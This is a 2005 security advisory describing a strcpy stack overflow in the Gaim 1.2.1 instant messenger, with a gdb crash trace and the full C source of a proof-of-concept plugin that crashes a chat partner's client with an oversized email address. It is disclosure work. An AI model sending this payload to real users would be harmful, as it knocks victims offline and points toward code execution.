Summary
"Gaim is a multi-protocol instant messaging (IM) client for Linux, BSD, MacOS X, and Windows. It is compatible with AIM and ICQ (Oscar protocol), MSN Messenger, Yahoo!, IRC, Jabber, Gadu-Gadu, SILC, GroupWise Messenger, and Zephyr networks."

A stack overflow vulnerability exists in Gaim, exploiting this vulnerability can lead to denial of service or, potentially, arbitrary code execution.

Credit:
The information has been provided by Ron.

Details
Vulnerable Systems:
* Gaim version 1.2.1

Ron was looking at the stack overflow reported in Gaim 1.2.1. It's was actually pretty trivial to find. The line that contains it looks like this:
strcpy(url_buf, gurl_buf->str);
url_buf is a 8192-byte buffer, and gurl_buf->str is an email address that is being displayed (user controlled).

The difficulty in writing a real exploit is that the input is sanitized, so any character over 128, as well as ' ', ',', '\n', '<', and others are stripped away. This doesn't leave much to play with, although it would be possible to write an exploit under these conditions.

Another difficulty is that most chat protocols limit you to a reasonable message size, and 8192 is typically well above that size. So even if you could successfully create an exploit, you would still have to do it on a chat protocol that allows very long messages. The final difficulty is that you also process the URL locally, when you send it, but that's not really a big deal. It would be trivial to filter it out in a plugin to make sure you don't crash yourself.

For this example, Ron just threw together a quick plugin (based on an old plugin He wrote, which is why it's such a mess) which sends a 10002-character email address when the user types "/vuln". Gaim crashes at the address 0x41414141.

(gdb) run
Starting program: /usr/local/bin/gaim
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 24908)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 24908)]
0x41414141 in ?? ()

Proof of Concept:
// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow vulnerability
// when processing email addresses. What this basically does is segfault you when you
// do a /vuln command in a conversation, and, if you're using a protocol that allows
// a 10002-character message to go through, also segfaults the person you sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of 'A's, and
// the return address of the function ends up at 0x41414141. That's no good for
// anybody.
//
// This code should be considered public domain, and is freely modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.

#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding vulnerability."

static GaimCmdId cmd;

char *code = "A@AAAA...(A*8192)...AAAAA";

gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args, gchar **error, void *data)
{
gaim_conv_im_send(GAIM_CONV_IM(conv), code);

return GAIM_CMD_STATUS_OK;
}

static gboolean plugin_load(GaimPlugin *plugin)
{
cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT, GAIM_CMD_FLAG_IM, NULL, (GaimCmdFunc)go, "/vuln", NULL);

return TRUE;
}

static gboolean plugin_unload(GaimPlugin *plugin)
{
gaim_cmd_unregister (cmd);

return TRUE;
}

static GaimPluginInfo info =
{
GAIM_PLUGIN_MAGIC,
GAIM_MAJOR_VERSION,
GAIM_MINOR_VERSION,
GAIM_PLUGIN_STANDARD, /**< type */
NULL, /**< ui_requirement */
0, /**< flags */
NULL, /**< dependencies */
GAIM_PRIORITY_DEFAULT, /**< priority */
NULL, /**< id */
N_("1.2.1 Email Overflow Demo"), /**< name */
VERSION, /**< version */
/** summary */
N_(""),
/** description */
N_(""),
"Ron <iago@valhallalegends.com>", /**< author */
"", /**< homepage */

plugin_load, /**< load */
plugin_unload, /**< unload */
NULL, /**< destroy */

NULL, /**< ui_info */
NULL, /**< extra_info */
NULL,
NULL
};

static void init_plugin(GaimPlugin *plugin)
{
}